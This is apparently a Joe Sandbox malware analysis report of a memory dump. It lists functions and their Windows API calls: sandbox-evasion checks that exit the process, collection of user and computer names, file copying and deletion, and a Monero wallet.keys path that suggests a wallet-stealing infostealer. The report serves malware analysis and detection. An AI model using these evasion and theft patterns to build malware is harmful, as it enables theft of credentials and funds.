Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 65521d841f991415e0d27da67970922f8c17c72c1356edda1b95e2c58119ba3e
Instruction ID: c712ab74831979eebb2c696424c4c5c1b2b29e82bd872e5bfa5d854b18a452f3
Opcode Fuzzy Hash: 65521d841f991415e0d27da67970922f8c17c72c1356edda1b95e2c58119ba3e
Instruction Fuzzy Hash: F30117B9A40308BBD700DFE4DC49FAFB7B9EB44741F108555FA05A7281DB7059408B51

Function 003D69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E632C0), ref: 003D98A1
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E63320), ref: 003D98BA
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E633F8), ref: 003D98D2
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E63350), ref: 003D98EA
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E63368), ref: 003D9903
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E6A1B8), ref: 003D991B
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E55710), ref: 003D9933
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E55950), ref: 003D994C
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E63158), ref: 003D9964
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E63410), ref: 003D997C
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E63248), ref: 003D9995
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E63440), ref: 003D99AD
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E55930), ref: 003D99C5
Part of subcall function 003D9860: GetProcAddress.KERNEL32(74DD0000,00E63170), ref: 003D99DE

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003C11D0: ExitProcess.KERNEL32 ref: 003C1211

Part of subcall function 003C1160: GetSystemInfo.KERNEL32(?), ref: 003C116A
Part of subcall function 003C1160: ExitProcess.KERNEL32 ref: 003C117E

Part of subcall function 003C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003C112B
Part of subcall function 003C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 003C1132
Part of subcall function 003C1110: ExitProcess.KERNEL32 ref: 003C1143

Part of subcall function 003C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003C123E
Part of subcall function 003C1220: __aulldiv.LIBCMT ref: 003C1258
Part of subcall function 003C1220: __aulldiv.LIBCMT ref: 003C1266
Part of subcall function 003C1220: ExitProcess.KERNEL32 ref: 003C1294

Part of subcall function 003D6770: GetUserDefaultLangID.KERNEL32 ref: 003D6774

Part of subcall function 003C1190: ExitProcess.KERNEL32 ref: 003C11C6

Part of subcall function 003D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003C11B7), ref: 003D7880
Part of subcall function 003D7850: RtlAllocateHeap.NTDLL(00000000), ref: 003D7887
Part of subcall function 003D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003D789F

Part of subcall function 003D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7910
Part of subcall function 003D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003D7917
Part of subcall function 003D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003D792F

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E6A048,?,003E110C,?,00000000,?,003E1110,?,00000000,003E0AEF), ref: 003D6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003D6AE8
CloseHandle.KERNEL32(00000000), ref: 003D6AF9
Sleep.KERNEL32(00001770), ref: 003D6B04
CloseHandle.KERNEL32(?,00000000,?,00E6A048,?,003E110C,?,00000000,?,003E1110,?,00000000,003E0AEF), ref: 003D6B1A
ExitProcess.KERNEL32 ref: 003D6B22

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: f70825764bf76d7e0094359c990734b3dc249e3f67e71a10ba23095409b7f083
Instruction ID: e4a3c15104f2376706e517bdf58c3dd170ff910607626dd37922554f4ed558f7
Opcode Fuzzy Hash: f70825764bf76d7e0094359c990734b3dc249e3f67e71a10ba23095409b7f083
Instruction Fuzzy Hash: CE314172940208AADB07FBF0ED57FEE7779AF04340F10451AF512AA282DF705905D7A6

Function 003C99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
LocalFree.KERNEL32(003C148F), ref: 003C9A90
CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 6842b44a6d7c336a91d823a57d4f27f68064f0410681862cbe770ddf383d7e5f
Instruction ID: 45487f1ec1e94a0f2b4f69c82b841a3ff47d45a8f7932dba6b54ba4b78c29f9e
Opcode Fuzzy Hash: 6842b44a6d7c336a91d823a57d4f27f68064f0410681862cbe770ddf383d7e5f
Instruction Fuzzy Hash: 9C3109B8A00209EFDB15CF94D989FAE77B9FF48340F118159E911A7290D774AE41CFA1

Function 003C1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003C123E
__aulldiv.LIBCMT ref: 003C1258
__aulldiv.LIBCMT ref: 003C1266
ExitProcess.KERNEL32 ref: 003C1294

Strings

@, xrefs: 003C1233

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: d072a57bef1cddab49fa5a90e5cb796b1dbe23a7cb67e93edb3e28da2f2fb2ac
Instruction ID: 7181a7ff01452b14093dbd633a8a3025652ab0ebfcfa1fed8385698562fc6dac
Opcode Fuzzy Hash: d072a57bef1cddab49fa5a90e5cb796b1dbe23a7cb67e93edb3e28da2f2fb2ac
Instruction Fuzzy Hash: 11016DB5D80308BAEB11EBE4DC49FAEBB78AB05701F208449E705FA2C1D7B469419799

Function 003D4BB0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D4BEA
lstrcat.KERNEL32(?,00E6EBD8), ref: 003D4C08

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D492C
Part of subcall function 003D4910: FindFirstFileA.KERNEL32(?,?), ref: 003D4943

Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FDC), ref: 003D4971
Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FE0), ref: 003D4987
Part of subcall function 003D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003D4B7D
Part of subcall function 003D4910: FindClose.KERNEL32(000000FF), ref: 003D4B92

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D49B0
Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E08D2), ref: 003D49C5
Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D49E2
Part of subcall function 003D4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003D4A1E
Part of subcall function 003D4910: lstrcat.KERNEL32(?,00E6F588), ref: 003D4A4A
Part of subcall function 003D4910: lstrcat.KERNEL32(?,003E0FF8), ref: 003D4A5C
Part of subcall function 003D4910: lstrcat.KERNEL32(?,?), ref: 003D4A70
Part of subcall function 003D4910: lstrcat.KERNEL32(?,003E0FFC), ref: 003D4A82
Part of subcall function 003D4910: lstrcat.KERNEL32(?,?), ref: 003D4A96
Part of subcall function 003D4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003D4AAC
Part of subcall function 003D4910: DeleteFileA.KERNEL32(?), ref: 003D4B31

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D4A07

Strings

8, xrefs: 003D4C49
x, xrefs: 003D4CB4
@, xrefs: 003D4C0E, 003D4C43, 003D4C78, 003D4CAE, 003D4CE3, 003D4D19

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 8$@$x
API String ID: 2104210347-703129977
Opcode ID: e983b1074a316ea68c34d8657dc3a9c0f1a1ded177f056cb162006c7332c0f66
Instruction ID: b295a80248da49c35c35674336ac23b9ff31ffd34f817603744d8ff479f1d509
Opcode Fuzzy Hash: e983b1074a316ea68c34d8657dc3a9c0f1a1ded177f056cb162006c7332c0f66
Instruction Fuzzy Hash: 0D41C9B750020467C759FBA0FC52EEF333DA785740F00864DB6459A286EE759B8C8B92

Function 6C59C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C59C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C59C969
GetSystemInfo.KERNEL32(?), ref: 6C59C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C59C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C59C9E2

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 993481826590c165bb56778608f11084b5f00f09fbb0b0d72ec3ad596bd95013
Instruction ID: febb55ea9c25d327882697e636a71ffa50e804c050335bb8c0eb402118f4e0d8
Opcode Fuzzy Hash: 993481826590c165bb56778608f11084b5f00f09fbb0b0d72ec3ad596bd95013
Instruction Fuzzy Hash: 0821C531741218ABDB14AB25CCC4BAE77B9EB8A744F50451EF943B7A80EB707D00C799

Function 003C12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C12B4
RtlAllocateHeap.NTDLL(00000000), ref: 003C12BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003C12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003C12F5
RegCloseKey.ADVAPI32(?), ref: 003C12FF

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 565d861862c0eb9be215a8a15a4067ff738c6fc44d5def82d157de0f789cb1db
Instruction ID: 72a4de06d98a779c35bfb484d36fc1b292731151071833ed56cc18448680aeee
Opcode Fuzzy Hash: 565d861862c0eb9be215a8a15a4067ff738c6fc44d5def82d157de0f789cb1db
Instruction Fuzzy Hash: F90131B9A40308BBDB00DFE0DC49FAFB7B9EB48701F008159FA05D7280D6709A018F51

Function 003CA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D8B60: GetSystemTime.KERNEL32(003E0E1A,00E6B6C8,003E05AE,?,?,003C13F9,?,0000001A,003E0E1A,00000000,?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003D8B86

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003CA2E1
lstrlen.KERNEL32(00000000,00000000), ref: 003CA3FF
